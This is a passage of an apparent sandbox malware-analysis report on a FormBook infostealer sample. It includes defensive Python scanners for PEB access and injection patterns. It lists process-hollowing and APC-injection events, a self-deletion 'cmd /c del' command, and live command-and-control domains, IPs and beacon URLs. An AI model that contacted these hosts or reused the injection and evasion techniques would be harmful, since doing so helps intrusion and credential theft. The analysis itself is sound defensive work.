Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048F51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048F51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_049349A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_049349A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_049349A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_049349A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_0487B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_0487B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_0487B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_049041E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04879100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04879100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04879100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04894120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04894120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04894120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04894120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04894120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048A513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048A513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_0489B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_0489B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_0487C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0487B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0487B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048AD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048AD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0488AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0488AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048AFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04888A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0493AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0493AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0487AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0487AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04893A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04875210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04875210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04875210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04875210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0493EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04879240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04879240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04879240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04879240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04904257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\cscript.exeProcess token adjusted: Debug
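The `mov eax, dword ptr fs:[00000030h]` hits listed above are loads of the PEB pointer: in 32-bit code fs:[30h] is TEB->ProcessEnvironmentBlock, and that load is where user-mode debugger checks (PEB->BeingDebugged at +2, PEB->NtGlobalFlag at +0x68) and hash-based API resolution (PEB->Ldr at +0xC) begin. Legitimate runtime and loader code performs the same load, which is why the report files this signature as informational; what distinguishes the injected code is which PEB member is read next. The scanner below is an added example, not tooling from the Joe Sandbox report: it finds every 32-bit `mov r32, fs:[30h]` encoding in a code blob and reports the PEB field dereferenced shortly after. The sample bytes are constructed for the example and are not taken from the sample.

```python
import re

# 32-bit register order used by the x86 ModRM reg and rm fields.
REG32 = ("eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi")

# Encodings of `mov r32, dword ptr fs:[30h]` in 32-bit code. fs:[30h] is
# TEB->ProcessEnvironmentBlock, so this load opens most user-mode debugger
# checks and hash-based API resolution. 64-bit code reads gs:[60h] instead
# and is not handled here.
#   64 A1 30 00 00 00        mov eax, fs:[30h]   (short form, eax only)
#   64 8B /r 30 00 00 00     mov r32, fs:[30h]   (ModRM mod=00, rm=101 -> disp32)
PEB_LOAD = re.compile(
    rb"\x64(?:\xA1|\x8B(?P<modrm>[\x05\x0D\x15\x1D\x25\x2D\x35\x3D]))\x30\x00\x00\x00"
)

# PEB members that injected code typically reads right after the load.
PEB_FIELDS = {0x02: "BeingDebugged", 0x0C: "Ldr", 0x68: "NtGlobalFlag"}

WINDOW = 16  # bytes examined after the load for a [reg+disp8] access


def _field_read_after(code, start, reg_idx):
    """Name the PEB member read via [reg+disp8] within WINDOW bytes, else None."""
    window = code[start:start + WINDOW]
    for i in range(len(window) - 1):
        modrm, disp8 = window[i], window[i + 1]
        # mod=01 means [base+disp8]; rm names the base; rm=100 would be a SIB byte.
        if (modrm >> 6) == 1 and (modrm & 7) == reg_idx and reg_idx != 4:
            if disp8 in PEB_FIELDS:
                return PEB_FIELDS[disp8]
    return None


def scan_peb_access(code):
    """Return [(offset, register, field)] for every 32-bit `mov r32, fs:[30h]`."""
    hits = []
    for m in PEB_LOAD.finditer(code):
        modrm = m.group("modrm")
        reg_idx = 0 if modrm is None else (modrm[0] >> 3) & 7
        hits.append((m.start(), REG32[reg_idx], _field_read_after(code, m.end(), reg_idx)))
    return hits


# Constructed sample (not bytes from the report): three typical sequences as
# they appear in unpacked code, separated by filler.
SAMPLE = (
    b"\x90\x90\x90\x90"
    # mov eax, fs:[30h] ; movzx eax, byte ptr [eax+2] ; test eax, eax ; jnz +5
    + b"\x64\xA1\x30\x00\x00\x00" + b"\x0F\xB6\x40\x02" + b"\x85\xC0" + b"\x75\x05"
    + b"\xC3\x90"
    # mov ecx, fs:[30h] ; mov eax, [ecx+68h] ; test al, 70h   (NtGlobalFlag heap flags)
    + b"\x64\x8B\x0D\x30\x00\x00\x00" + b"\x8B\x41\x68" + b"\xA8\x70"
    + b"\xC3"
    # mov edx, fs:[30h] ; mov edx, [edx+0Ch]   (start of a PEB->Ldr module walk)
    + b"\x64\x8B\x15\x30\x00\x00\x00" + b"\x8B\x52\x0C"
    + b"\xC3"
)

if __name__ == "__main__":
    for offset, reg, field in scan_peb_access(SAMPLE):
        print(f"{offset:#06x}: mov {reg}, fs:[30h] -> {field or 'no field read within window'}")
```

Run it against an unpacked region (for this report, the `18.2.cscript.exe.*.unpack` dumps) rather than the packed NSIS installer: the loads in the table above sit in the injected 0x0487xxxx region of cscript.exe, so a hit that is followed by a BeingDebugged or NtGlobalFlag read confirms the anti-debug intent, while a hit followed by an Ldr read marks the API-resolution routine worth setting a breakpoint on.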

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.fredrika-stahl.com
          Source: C:\Windows\explorer.exeDomain query: www.purpleqube.com
          Source: C:\Windows\explorer.exeDomain query: www.motivactivewear.com
          Source: C:\Windows\explorer.exeDomain query: www.reufhroir.com
          Source: C:\Windows\explorer.exeNetwork Connect: 119.81.95.146 80
          Source: C:\Windows\explorer.exeDomain query: www.tori2020.com
          Source: C:\Windows\explorer.exeNetwork Connect: 184.168.131.241 80
          Source: C:\Windows\explorer.exeNetwork Connect: 94.136.40.51 80
          Source: C:\Windows\explorer.exeDomain query: www.doodstore.net
          Source: C:\Windows\explorer.exeDomain query: www.mutanterestaurante.com
          Source: C:\Windows\explorer.exeDomain query: www.5xlsteve.com
          Source: C:\Windows\explorer.exeNetwork Connect: 185.53.177.12 80
          Source: C:\Windows\explorer.exeNetwork Connect: 50.87.146.99 80
          Source: C:\Windows\explorer.exeDomain query: www.oceancollaborative.com
          Source: C:\Windows\explorer.exeNetwork Connect: 75.2.124.199 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeDomain query: www.9wsc.com
          Source: C:\Windows\explorer.exeDomain query: www.underce.com
          Source: C:\Windows\explorer.exeNetwork Connect: 222.239.248.209 80
          Source: C:\Windows\explorer.exeDomain query: www.kocaelimanliftkiralama.site
          Source: C:\Windows\explorer.exeNetwork Connect: 67.199.248.12 80
          Source: C:\Windows\explorer.exeNetwork Connect: 23.225.101.32 80
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeSection loaded: unknown target: C:\Users\user\Desktop\WXs8v9QuE7.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeThread register set: target process: 3472
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeThread register set: target process: 3472
          Source: C:\Windows\SysWOW64\cscript.exeThread register set: target process: 3472
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeSection unmapped: C:\Windows\SysWOW64\cscript.exe base address: AC0000
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeProcess created: C:\Users\user\Desktop\WXs8v9QuE7.exe 'C:\Users\user\Desktop\WXs8v9QuE7.exe'
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\WXs8v9QuE7.exe'
          Source: explorer.exe, 00000004.00000000.245636520.0000000005EA0000.00000004.00000001.sdmp, cscript.exe, 00000012.00000002.494686146.0000000003100000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.235951037.0000000001640000.00000002.00000001.sdmp, cscript.exe, 00000012.00000002.494686146.0000000003100000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.235951037.0000000001640000.00000002.00000001.sdmp, cscript.exe, 00000012.00000002.494686146.0000000003100000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
          Source: explorer.exe, 00000004.00000000.258808512.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000004.00000000.235951037.0000000001640000.00000002.00000001.sdmp, cscript.exe, 00000012.00000002.494686146.0000000003100000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000004.00000000.235951037.0000000001640000.00000002.00000001.sdmp, cscript.exe, 00000012.00000002.494686146.0000000003100000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 0_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
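The injection signatures above fire on single API-level events. What names the technique is the combination of events per (injecting process, target) pair: a newly created process whose image is unmapped, a writable and executable section mapped into it and its thread context rewritten is process hollowing; a mapped section plus a queued APC is APC injection; a mapped section plus a rewritten thread context in an already running process is thread-context hijacking. The following is an added example, not tooling from the report, of that correlation over lines in the report's own `Source: <image><event>: <details>` shape. The event lines are constructed for the example, and the mapping of the numeric targets in the 'Thread register set' lines to image paths is an assumption: the report above leaves PID 3472 unresolved, and a real pipeline would take that mapping from the process list.

```python
import re
from collections import defaultdict

# One sandbox signature line. The extraction leaves no separator between the
# source image path and the event name, so the image is matched non-greedily
# up to the first recognised event name.
EVENT_RE = re.compile(
    r"^Source: (?P<src>.+?)"
    r"(?P<kind>Process created|Section loaded|Section unmapped|"
    r"Thread register set|Thread APC queued): (?P<rest>.*)$"
)

# Step sets that complete a technique for one (source, target) pair.
HOLLOWING = {"created", "unmapped", "mapped_rwx", "context_set"}
APC_INJECT = {"mapped_rwx", "apc_queued"}
THREAD_HIJACK = {"mapped_rwx", "context_set"}


def parse_event(line, pid_map):
    """Return (source, target, step) or None for lines that carry no injection step.
    pid_map resolves the numeric PIDs used by 'Thread register set' to image paths."""
    m = EVENT_RE.match(line.strip())
    if not m:
        return None
    src, kind, rest = m.group("src"), m.group("kind"), m.group("rest")
    if kind == "Process created":
        # '<image> <command line>'; image paths without spaces, as in the report.
        return src, rest.split(" ", 1)[0], "created"
    if kind == "Section unmapped":
        return src, rest.split(" base address:", 1)[0], "unmapped"
    if kind == "Section loaded":
        target, _, prot = rest.partition(" protection: ")
        target = target.replace("unknown target: ", "", 1)
        # Only a mapping that is executable can carry injected code; a plain
        # read/write section is data (the report shows one such mapping).
        return src, target, "mapped_rwx" if "execute" in prot else "mapped_rw"
    if kind == "Thread register set":
        pid = rest.replace("target process: ", "", 1)
        return src, pid_map.get(pid, "pid:" + pid), "context_set"
    if kind == "Thread APC queued":
        return src, rest.replace("target process: ", "", 1), "apc_queued"
    return None


def classify_injection(lines, pid_map=None):
    """Group steps by (source, target) and name the technique each pair completes.
    Returns {(source, target): technique}; pairs with no complete chain are omitted."""
    pid_map = pid_map or {}
    steps = defaultdict(set)
    for line in lines:
        parsed = parse_event(line, pid_map)
        if parsed:
            src, target, step = parsed
            steps[(src, target)].add(step)
    findings = {}
    for pair, seen in steps.items():
        if HOLLOWING <= seen:
            findings[pair] = "process hollowing"
        elif APC_INJECT <= seen:
            findings[pair] = "APC injection"
        elif THREAD_HIJACK <= seen:
            findings[pair] = "thread context hijacking"
    return findings


# Constructed events in the report's line format (not copied from the report).
# The PID-to-image mapping is an assumption made for this example only.
SAMPLE_PIDS = {"3472": r"C:\Windows\SysWOW64\cscript.exe", "2104": r"C:\Windows\explorer.exe"}
SAMPLE_EVENTS = [
    r"Source: C:\Users\user\Desktop\WXs8v9QuE7.exeProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe",
    r"Source: C:\Users\user\Desktop\WXs8v9QuE7.exeSection unmapped: C:\Windows\SysWOW64\cscript.exe base address: AC0000",
    r"Source: C:\Users\user\Desktop\WXs8v9QuE7.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write",
    r"Source: C:\Users\user\Desktop\WXs8v9QuE7.exeThread register set: target process: 3472",
    r"Source: C:\Users\user\Desktop\WXs8v9QuE7.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write",
    r"Source: C:\Users\user\Desktop\WXs8v9QuE7.exeThread APC queued: target process: C:\Windows\explorer.exe",
    r"Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write",
    r"Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write",
    r"Source: C:\Windows\SysWOW64\cscript.exeThread register set: target process: 2104",
    r"Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\WXs8v9QuE7.exe'",
]

if __name__ == "__main__":
    for (src, target), technique in classify_injection(SAMPLE_EVENTS, SAMPLE_PIDS).items():
        print(f"{technique}: {src} -> {target}")
```

The cmd.exe line is deliberately left unclassified: creating a child is not injection on its own, which keeps the `cmd /c del` self-deletion step out of the injection findings even though it belongs to the same process tree.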

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara matchFile source: 00000001.00000001.231883360.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.301526292.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.301567040.00000000004C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.234632284.0000000002280000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.493603616.0000000000A90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.492153305.0000000000560000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.494502874.0000000002CF0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.301714612.00000000005D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.1.WXs8v9QuE7.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.WXs8v9QuE7.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.WXs8v9QuE7.exe.2280000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.WXs8v9QuE7.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.WXs8v9QuE7.exe.2280000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.WXs8v9QuE7.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara matchFile source: 00000001.00000001.231883360.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.301526292.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.301567040.00000000004C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.234632284.0000000002280000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.493603616.0000000000A90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.492153305.0000000000560000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.494502874.0000000002CF0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.301714612.00000000005D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.1.WXs8v9QuE7.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.WXs8v9QuE7.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.WXs8v9QuE7.exe.2280000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.WXs8v9QuE7.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.WXs8v9QuE7.exe.2280000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.WXs8v9QuE7.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
          Execution: Native API 1; Shared Modules 1; At (Linux); At (Windows); Cron; Launchd
          Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
          Privilege Escalation: Process Injection 512; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
          Defense Evasion: Virtualization/Sandbox Evasion 3; Process Injection 512; Deobfuscate/Decode Files or Information 1; Obfuscated Files or Information 3; Software Packing 11; Steganography
          Credential Access: Input Capture 1; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
          Discovery: Security Software Discovery 131; Virtualization/Sandbox Evasion 3; Process Discovery 2; Remote System Discovery 1; File and Directory Discovery 2; System Information Discovery 13
          Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
          Collection: Input Capture 1; Archive Collected Data 1; Clipboard Data 1; Input Capture; Keylogging; GUI Input Capture
          Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
          Command and Control: Encrypted Channel 1; Ingress Tool Transfer 3; Non-Application Layer Protocol 3; Application Layer Protocol 13; Fallback Channels; Multiband Communication
          Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service
          Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features
          Impact: System Shutdown/Reboot 1; Device Lockout; Delete Device Data

          Behavior Graph


          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          Behavior Graph ID: 438542   Sample: WXs8v9QuE7.exe   Start date: 22/06/2021   Architecture: WINDOWS   Score: 100

          Sample
            DNS/IP: www.shenghui118.com; www.reufhroir.com; 2 other IPs or domains
            Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 5 other signatures
            Started: WXs8v9QuE7.exe (19); explorer.exe

          WXs8v9QuE7.exe (19)
            Dropped: C:\Users\user\AppData\Local\...\pplsesniiplv (DOS); C:\Users\user\AppData\Local\...\System.dll (PE32)
            Signatures: Detected unpacking (changes PE section rights); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
            Started: WXs8v9QuE7.exe
              Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
              Started: cscript.exe
                Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                Started: cmd.exe (1)
                  Started: conhost.exe

          explorer.exe
            DNS/IP: mutanterestaurante.com 50.87.146.99, 49749, 80 UNIFIEDLAYER-AS-1US United States; www.fredrika-stahl.com 185.53.177.12, 49743, 80 TEAMINTERNET-ASDE Germany; 16 other IPs or domains
            Signatures: System process connects to network (likely due to code injection or exploit)
            Started: autoconv.exe

          Screenshots


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source         | Detection | Scanner        | Label
          WXs8v9QuE7.exe | 19%       | Virustotal     |
          WXs8v9QuE7.exe | 20%       | ReversingLabs  |
          WXs8v9QuE7.exe | 100%      | Joe Sandbox ML |

          Dropped Files

          Source                                                  | Detection | Scanner       | Label
          C:\Users\user\AppData\Local\Temp\nsa7685.tmp\System.dll | 0%        | Metadefender  |
          C:\Users\user\AppData\Local\Temp\nsa7685.tmp\System.dll | 0%        | ReversingLabs |

          Unpacked PE Files

          Source                              | Detection | Scanner | Label
          18.2.cscript.exe.748a10.0.unpack    | 100%      | Avira   | TR/Patched.Ren.Gen
          18.2.cscript.exe.4d87960.5.unpack   | 100%      | Avira   | TR/Patched.Ren.Gen
          1.1.WXs8v9QuE7.exe.400000.0.unpack  | 100%      | Avira   | TR/Crypt.ZPACK.Gen
          1.2.WXs8v9QuE7.exe.400000.0.unpack  | 100%      | Avira   | TR/Crypt.ZPACK.Gen
          0.2.WXs8v9QuE7.exe.400000.0.unpack  | 100%      | Avira   | HEUR/AGEN.1130366
          0.2.WXs8v9QuE7.exe.2280000.2.unpack | 100%      | Avira   | TR/Crypt.ZPACK.Gen
          1.0.WXs8v9QuE7.exe.400000.0.unpack  | 100%      | Avira   | HEUR/AGEN.1130366
          0.0.WXs8v9QuE7.exe.400000.0.unpack  | 100%      | Avira   | HEUR/AGEN.1130366

          Domains

          Source                 | Detection | Scanner    | Label
          www.fredrika-stahl.com | 0%        | Virustotal |

          URLs

          Source | Detection | Scanner | Label
          http://www.doodstore.net/bp3i/?2db=/O9fLU9fKPl9hp8FjcQBjfSEDJBN8B2QQZ2zni9zphKaS5k3K3CvlS+mwENkfwkv1cT8&ApZx=O2MHiVr0W | 0% | Avira URL Cloud | safe
          http://www.5xlsteve.com/bp3i/?2db=zbNXh78uhP7VzN8kPHFueaY47g6J6psPJhyFJvfKuCHih9LJaB8PnmAAQmuNnVgiv7yX&ApZx=O2MHiVr0W | 0% | Avira URL Cloud | safe
          http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
          http://www.mutanterestaurante.com/bp3i/?2db=E7M2l69Gv0yeE4KBOXHGh6mx//FtP199Dh6qlRwE96ss/V1ksNZ+8ksSpGi6EwZCpyax&ApZx=O2MHiVr0W | 0% | Avira URL Cloud | safe
          http://www.tori2020.com/bp3i/?2db=MlxGGjj2GILR3uc1yrCD+B+Qm9+cwVH8bO7hosl1JjKtZPf8ruvdLFpmglVOZIulzoDe&ApZx=O2MHiVr0W | 0% | Avira URL Cloud | safe
          http://www.motivactivewear.com/bp3i/?2db=zzYPr0OAQH7TXWaM6HNOV25V/HRJbXLG3d0AEq0Xu0niOsubCwaCiuhJfb7NIA/TR+lf&ApZx=O2MHiVr0W | 0% | Avira URL Cloud | safe
          http://www.tiro.com | 0% | URL Reputation | safe
          www.oceancollaborative.com/bp3i/ | 0% | Avira URL Cloud | safe
          http://www.goodfont.co.kr | 0% | URL Reputation | safe
          http://www.carterandcone.coml | 0% | URL Reputation | safe
          http://www.sajatypeworks.com | 0% | URL Reputation | safe
          http://www.typography.netD | 0% | URL Reputation | safe
